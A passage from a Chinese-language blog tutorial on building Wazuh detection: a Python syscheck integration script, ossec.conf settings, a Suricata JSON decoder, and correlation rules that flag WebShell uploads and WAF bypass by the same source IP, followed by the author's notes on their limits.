with open(log_file, "a") as f:
f.write(msg)

def normalized_data(alert):
if alert['agent']['id'] == '000':
alert['srcip'] = wazuh_server
elif alert['agent'].get('ip'):
alert['srcip'] = alert['agent']['ip']
alert['dstip'] = alert['agent']['ip']
alert['integration'] = 'custom-syscheck'
alert['create_timestamp'] = iso8601()
debug(alert)
return(alert)

if __name__ == "__main__":
try:
# Read arguments
bad_arguments = False
if len(sys.argv) >= 4:
msg = '{0} {1} {2} {3} {4}'.format(now, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] if len(sys.argv) > 4 else '')
else:
msg = '{0} Wrong arguments'.format(now)
bad_arguments = True

# Logging the call
with open(log_file, 'a') as f:
f.write(msg + '\n')

if bad_arguments:
debug("# Exiting: Bad arguments.")
sys.exit(1)

# Main function
main(sys.argv)

except Exception as e:
debug(str(e))
raise
  • ossec.conf
    • 配置syslog选用TCP协议;
    • 加载预处理脚本;
    • 加载脚本输出日志;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<ossec_config>
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>tcp</protocol> <!-- udp(default)/tcp -->
<allowed-ips>192.168.199.0/24</allowed-ips>
</remote>

<!-- Custom external Integration -->
<integration>
<name>custom-syscheck</name>
<rule_id>554</rule_id>
<group>syscheck</group>
<alert_format>json</alert_format>
</integration>

<!-- Custom syscheck.json -->
<localfile>
<log_format>json</log_format>
<location>/var/ossec/logs/syscheck.json</location>
</localfile>
</ossec_config>
  • local_decoder_normalized.xml

Sample

1
2
3
4
5
6
7
8
<!--
2020 Mar 03 02:53:39 logstash NORMALIZED[-]: {"timestamp":"2020-02-21T19:47:04.382300+0800","flow_id":1133835979634527,"in_iface":"wlp3s0","event_type":"alert","src_ip":"192.168.199.97","src_port":60022,"dest_ip":"192.168.199.162","dest_port":59143,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":123456,"rev":1,"signature":"LOCAL RULES XXX","severity":3}}
-->

<decoder name="nta_json">
<prematch>NORMALIZED[-]: </prematch>
<plugin_decoder offset="after_prematch">JSON_Decoder</plugin_decoder>
</decoder>
  • 0901-local_raw.xml
    • 默认引用的解码器为json, 这里需要修改为刚才新增的nta_json;
    • 通过overwrite=yes覆盖原始规则;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<group name="suricata,">

<!-- /var/ossec/ruleset/rules/0475-suricata_rules.xml -->
<!-- Defind Suricata Rules -->
<!-- ID: 86600 - 86699 -->

<rule id="86600" level="0" overwrite="yes">
<decoded_as>nta_json</decoded_as>
<field name="timestamp">\.+</field>
<field name="event_type">\.+</field>
<description>Suricata messages.</description>
<options>no_full_log</options>
</rule>

</group>
  • 0905-local_syscheck.xml

    为预处理脚本生成的日志进行解析

1
2
3
4
5
6
7
8
<group name="syscheck,">
<rule id="187100" level="7">
<decoded_as>json</decoded_as>
<field name="integration">custom-syscheck</field>
<description>syscheck integration messages.</description>
<options>no_full_log</options>
</rule>
</group>
  • 9999-local_composite.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<group name="local,composite,">

<!-- Local Composite Rules Range ID: 200000 - 205000 -->

<rule id="200000" level="15" frequency="2" timeframe="600">
<if_matched_sid>101000</if_matched_sid> <!-- 文件上传类规则 or 检测WebShell上传类规则 -->
<if_sid>187100</if_sid>
<same_source_ip /> <!-- 通过IP进行关联 -->
<description>Phase 3: 检测到服务器:$(srcip), 被上传WebShell.</description>
<options>no_full_log</options>
</rule>

<rule id="200001" level="12" frequency="2" timeframe="600">
<if_matched_sid>88801</if_matched_sid> <!-- WAF安全事件 -->
<if_group>ids</if_group>
<same_source_ip />
<description>Phase 3: Alarm - Same ip Bypass WAF of within 600 seconds. $(srcip) -> $(http.hostname) -> $(alert.signature) -> $(alert.signature_id).</description>
<options>no_full_log</options>
</rule>

</group>

总结

  1. 对于WebShell关联检测,目前采用的是同源IP以及时序的关联, 最为靠谱的应该是通过Hash的比对。这里要吐槽一下Suricata默认的fileinfo, 没办法自定义输出, 只要开启可被还原的协议都会输出fileinfo的事件。正因如此, 数据量一大Wazuh的引擎压力会很大。我尝试通过Lua来自定义一个文件审计类的事件, 貌似也同样没办法区分协议更别说针对http过滤条件进行自定义的过滤输出了。

  2. 由于关联规则本身是通过底层多个安全事件进行维度的关联提升告警的可靠性。因此, 底层安全事件不够准确同样会让上层的关联规则带来大量误报。对于底层安全事件的优化也是需要持续进行的。

  3. Wazuh v3.11.4 采用syslog接收大日志时, 会触发memory violation导致ossec-remoted进程重启, 该问题已向社区反馈下个版本中会解决。

参考